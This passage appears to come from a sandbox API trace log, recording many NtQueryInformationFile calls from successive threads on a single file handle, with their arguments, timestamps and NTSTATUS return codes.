IoStatusBlock=0x373fbf8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fbf8, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 736 os_tid = 0x75c [0162.456] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361f840, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361f840, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 737 os_tid = 0x240 [0162.458] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ff948, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ff948, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 738 os_tid = 0x320 [0162.460] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fb40, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fb40, FileInformation=0x210e20) returned 0x0 Thread: id = 739 os_tid = 0x3b4 [0162.463] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369f820, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369f820, FileInformation=0x210e20) returned 0x0 Thread: id = 740 os_tid = 0x760 [0162.465] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfe50, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfe50, FileInformation=0x210e20) returned 0x0 Thread: id = 741 os_tid = 0xb00 [0162.467] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fab0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fab0, FileInformation=0x210e20) returned 0x0 Thread: id = 742 os_tid = 0x7fc [0162.469] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bf908, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bf908, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 743 os_tid = 0xb18 [0162.470] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359f8f8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359f8f8, FileInformation=0x210e20) returned 0x0 Thread: id = 744 os_tid = 0xa68 [0162.472] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dff48, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dff48, FileInformation=0x210e20) returned 0x0 Thread: id = 745 os_tid = 0x224 [0162.478] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffbb0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffbb0, FileInformation=0x210e20) returned 0x0 Thread: id = 746 os_tid = 0x2c4 [0162.481] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375f878, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375f878, FileInformation=0x210e20) returned 0x0 Thread: id = 747 os_tid = 0x24c [0162.485] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367ff48, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367ff48, FileInformation=0x210e20) returned 0x0 Thread: id = 748 os_tid = 0x4e8 [0162.487] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fd68, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fd68, FileInformation=0x210e20) returned 0x0 Thread: id = 749 os_tid = 0x220 [0162.488] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fed8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fed8, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 750 os_tid = 0xb04 [0162.490] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fd30, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fd30, FileInformation=0x210e20) returned 0x0 Thread: id = 751 os_tid = 0x180 [0162.492] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfc18, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfc18, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 752 os_tid = 0x53c [0162.494] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fb18, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fb18, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 753 os_tid = 0x5b4 [0162.495] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373f950, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373f950, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 754 os_tid = 0x614 [0162.497] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fbb0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fbb0, FileInformation=0x210e20) returned 0x0 Thread: id = 755 os_tid = 0x690 [0162.499] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fbb0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fbb0, FileInformation=0x210e20) returned 0x0 Thread: id = 756 os_tid = 0x440 [0162.502] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fdf8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fdf8, FileInformation=0x210e20) returned 0x0 Thread: id = 757 os_tid = 0x7d8 [0162.504] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369f8e8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369f8e8, FileInformation=0x210e20) returned 0x0 Thread: id = 758 os_tid = 0xa60 [0162.506] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfd78, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfd78, FileInformation=0x210e20) returned 0x0 Thread: id = 759 os_tid = 0xb24 [0162.508] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357f7d8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357f7d8, FileInformation=0x210e20) returned 0x0 Thread: id = 760 os_tid = 0x878 [0162.510] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373f958, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373f958, FileInformation=0x210e20) returned 0x0 Thread: id = 761 os_tid = 0xb1c [0162.515] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367f8b0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367f8b0, FileInformation=0x210e20) returned 0x0 Thread: id = 762 os_tid = 0xb08 [0162.517] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bf948, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bf948, FileInformation=0x210e20) returned 0x0 Thread: id = 763 os_tid = 0x4fc [0162.519] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfe40, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfe40, FileInformation=0x210e20) returned 0x0 Thread: id = 764 os_tid = 0x4dc [0162.521] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfde0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfde0, FileInformation=0x210e20) returned 0x0 Thread: id = 765 os_tid = 0x43c [0162.523] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fce8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fce8, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 766 os_tid = 0x1c4 [0162.525] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fcb8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fcb8, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 767 os_tid = 0xbec [0162.527] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ff868, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ff868, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 768 os_tid = 0xb48 [0162.528] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fe90, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fe90, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 769 os_tid = 0x5bc [0162.530] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363f7a8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363f7a8, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 770 os_tid = 0x6b8 [0162.532] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375f908, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375f908, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 771 os_tid = 0x2dc [0162.534] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357f888, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357f888, FileInformation=0x210e20) returned 0x0 Thread: id = 772 os_tid = 0x158 [0162.536] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfea0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfea0, FileInformation=0x210e20) returned 0x0 Thread: id = 773 os_tid = 0x6cc [0162.538] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffc58, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffc58, FileInformation=0x210e20) returned 0x0 Thread: id = 774 os_tid = 0x694 [0162.540] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffbf0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffbf0, FileInformation=0x210e20) returned 0x0 Thread: id = 775 os_tid = 0x6d8 [0162.542] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363f840, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363f840, FileInformation=0x210e20) returned 0x0 Thread: id = 776 os_tid = 0x87c [0162.544] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fbc0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fbc0, FileInformation=0x210e20) returned 0x0 Thread: id = 777 os_tid = 0xb88 [0162.563] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363f9b0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363f9b0, FileInformation=0x210e20) returned 0x0 Thread: id = 778 os_tid = 0xb8c [0162.565] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363ff00, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363ff00, FileInformation=0x210e20) returned 0x0 Thread: id = 779 os_tid = 0x700 [0162.567] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fa48, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fa48, FileInformation=0x210e20) returned 0x0 Thread: id = 780 os_tid = 0x6f0 [0162.569] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363f9a8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363f9a8, FileInformation=0x210e20) returned 0x0 Thread: id = 781 os_tid = 0x130 [0162.571] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fb48, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fb48, FileInformation=0x210e20) returned 0x0 Thread: id = 782 os_tid = 0x754 [0162.573] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fdc0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fdc0, FileInformation=0x210e20) returned 0x0 Thread: id = 783 os_tid = 0x72c [0162.575] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373f9a0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373f9a0, FileInformation=0x210e20) returned 0x0 Thread: id = 784 os_tid = 0x748 [0162.577] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfb40, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfb40, FileInformation=0x210e20) returned 0x0 Thread: id = 785 os_tid = 0x928 [0162.579] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361f7b0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361f7b0, FileInformation=0x210e20) returned 0x0 Thread: id = 786 os_tid = 0xcc [0162.581] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363f800, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363f800, FileInformation=0x210e20) returned 0x0 Thread: id = 787 os_tid = 0xd0 [0162.582] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bff78, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bff78, FileInformation=0x210e20) returned 0x0 Thread: id = 788 os_tid = 0xd4 [0162.585] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fb08, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fb08, FileInformation=0x210e20) returned 0x0 Thread: id = 789 os_tid = 0xd8 [0162.586] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359f888, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359f888, FileInformation=0x210e20) returned 0x0 Thread: id = 790 os_tid = 0xdc [0162.588] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fbb8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fbb8, FileInformation=0x210e20) returned 0x0 Thread: id = 791 os_tid = 0xe0 [0162.590] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fd20, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fd20, FileInformation=0x210e20) returned 0x0 Thread: id = 792 os_tid = 0xe4 [0162.645] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bf820, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bf820, FileInformation=0x210e20) returned 0x0 Thread: id = 793 os_tid = 0xe8 [0162.648] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359f860, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359f860, FileInformation=0x210e20) returned 0x0 Thread: id = 794 os_tid = 0xec [0162.650] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fa78, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fa78, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 795 os_tid = 0x9d8 [0162.653] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fd28, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fd28, FileInformation=0x210e20) returned 0x0 Thread: id = 796 os_tid = 0x898 [0162.655] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369f7a0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369f7a0, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 797 os_tid = 0x48c [0162.657] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ff8c0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ff8c0, FileInformation=0x210e20) returned 0x0 Thread: id = 798 os_tid = 0x6a4 [0162.659] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fe90, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fe90, FileInformation=0x210e20) returned 0x0 Thread: id = 799 os_tid = 0x20c [0162.661] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fd88, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fd88, FileInformation=0x210e20) returned 0x0 Thread: id = 800 os_tid = 0x704 [0162.663] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfa88, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfa88, FileInformation=0x210e20) returned 0x0 Thread: id = 801 os_tid = 0x568 [0162.665] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffa28, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffa28, FileInformation=0x210e20) returned 0x0 Thread: id = 802 os_tid = 0x5ac [0162.672] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359f818, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359f818, FileInformation=0x210e20) returned 0x0 Thread: id = 803 os_tid = 0x908 [0162.676] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373f968, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373f968, FileInformation=0x210e20) returned 0x0 Thread: id = 804 os_tid = 0x888 [0162.679] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359f998, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359f998, FileInformation=0x210e20) returned 0x0 Thread: id = 805 os_tid = 0x544 [0162.681] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfe60, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfe60, FileInformation=0x210e20) returned 0x0 Thread: id = 806 os_tid = 0x76c [0162.683] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fd90, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fd90, FileInformation=0x210e20) returned 0x0 Thread: id = 807 os_tid = 0xa9c [0162.686] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fb30, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fb30, FileInformation=0x210e20) returned 0x0 Thread: id = 808 os_tid = 0x114 [0162.688] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fbd0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fbd0, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 809 os_tid = 0x5b8 [0162.689] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fcc8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fcc8, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 810 os_tid = 0x814 [0162.691] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ff8b0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ff8b0, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 811 os_tid = 0x834 [0162.693] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357f9c8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357f9c8, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 812 os_tid = 0x884 [0162.700] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfb80, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfb80, FileInformation=0x210e20) returned 0x0 Thread: id = 813 os_tid = 0x5d4 [0162.702] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371f998, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371f998, FileInformation=0x210e20) returned 0x0 Thread: id = 814 os_tid = 0x340 [0162.704] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffbb8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffbb8, FileInformation=0x210e20) returned 0x0 Thread: id = 815 os_tid = 0x810 [0162.710] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffdd8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffdd8, FileInformation=0x210e20) returned 0xc000000d Thread: id = 816 os_tid = 0x830 [0162.711] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fb48, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fb48, FileInformation=0x210e20) returned 0x0 Thread: id = 817 os_tid = 0x880 [0162.717] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fd98, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fd98, FileInformation=0x210e20) returned 0x0 Thread: id = 818 os_tid = 0xae4 [0162.721] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fda0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fda0, FileInformation=0x210e20) returned 0x0 Thread: id = 819 os_tid = 0x570 [0162.730] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fbe0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fbe0, FileInformation=0x210e20) returned 0x0 Thread: id = 820 os_tid = 0xb40 [0162.733] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fdc0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fdc0, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 821 os_tid = 0x5f4 [0162.734] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffeb0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffeb0, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 822 os_tid = 0xbb8 [0162.737] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fa80, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fa80, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 823 os_tid = 0x598 [0162.739] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bf938, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bf938, FileInformation=0x210e20) returned 0x0 Thread: id = 824 os_tid = 0x4e4 [0162.741] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fb38, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fb38, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 825 os_tid = 0xbfc [0162.743] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fe48, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fe48, FileInformation=0x210e20) returned 0x0 Thread: id = 826 os_tid = 0x80c [0162.745] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365f858, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365f858, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 827 os_tid = 0xbf8 [0162.747] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fc30, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fc30, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 828 os_tid = 0x524 [0162.749] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfe28, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfe28, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 829 os_tid = 0x674 [0162.751] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fea0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fea0, FileInformation=0x210e20) returned 0x0 Thread: id = 830 os_tid = 0x4a0 [0162.753] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfb98, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfb98, FileInformation=0x210e20) returned 0xc000000d Thread: id = 831 os_tid = 0x5d8 [0162.755] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffb28, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffb28, FileInformation=0x210e20) returned 0x0 Thread: id = 832 os_tid = 0x69c [0162.757] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfdf8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfdf8, FileInformation=0x210e20) returned 0x0 Thread: id = 833 os_tid = 0x6a8 [0162.759] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35fff78, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35fff78, FileInformation=0x210e20) returned 0x0 Thread: id = 834 os_tid = 0x500 [0162.761] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fe50, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fe50, FileInformation=0x210e20) returned 0x0 Thread: id = 835 os_tid = 0x4e0 [0162.762] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfd90, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfd90, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 836 os_tid = 0x330 [0162.769] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfbd8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfbd8, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 837 os_tid = 0xa30 [0162.774] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365f8c8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365f8c8, FileInformation=0x210e20) returned 0x0 Thread: id = 838 os_tid = 0xb50 [0162.777] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fb98, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fb98, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 839 os_tid = 0xb70 [0162.779] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bf788, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bf788, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 840 os_tid = 0xb6c [0162.781] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fc78, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fc78, FileInformation=0x210e20) returned 0x0 Thread: id = 841 os_tid = 0xb74 [0162.783] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365f958, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365f958, FileInformation=0x210e20) returned 0x0 Thread: id = 842 os_tid = 0xb68 [0162.785] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fa18, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fa18, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 843 os_tid = 0x758 [0162.787] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fc40, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fc40, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 844 os_tid = 0x3d4 [0162.789] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fda8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fda8, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 845 os_tid = 0x484 [0162.790] NtQueryInformationFile (in: 